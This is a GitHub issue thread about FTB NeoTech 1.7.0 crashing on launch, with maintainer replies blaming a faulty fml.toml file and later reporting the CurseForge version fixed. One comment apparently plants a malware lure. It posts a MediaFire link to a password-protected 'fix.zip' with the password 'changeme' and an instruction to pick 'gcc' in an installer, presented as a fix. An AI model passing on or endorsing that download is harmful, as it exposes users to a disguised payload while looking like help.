### ISSUE TITLE
[CF] NeoTech Crash

### ISSUE THREAD

**Issue by max0n4ik** [FTBTeam/FTB-Modpack-Issues#5685]
### Modpack

FTB NeoTech

### Modpack version

1.7.0

### Has the pack been modified

No

### Log Files

https://pastebin.com/kSLrX6Bn

### Describe the bug

when i start modpack game crush  

### Steps to reproduce

start pack in prisma launcher

### Expected behaviour

i think its issue with neoforge and fml.toml file

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Gaz492** [comment]
You are correct that its an issue with the fml.toml file, you could either delete the file then start up the modpack again, or you could download another copy of the modpack and copy the fml.toml over from the new install of the modpack to your existing one.

**Comment by Gaz492** [comment]
So you are likely running into an issue we are working on resolving with the curseforge version of neotech.

At the moment, the best solution is to download the modpack using the FTB App until we have resolved the issue with the curseforge version.

**Comment by Gaz492** [comment]
The curseforge version of the pack should be working now, you might need to download a fresh copy of the modpack if it doesnt show an update
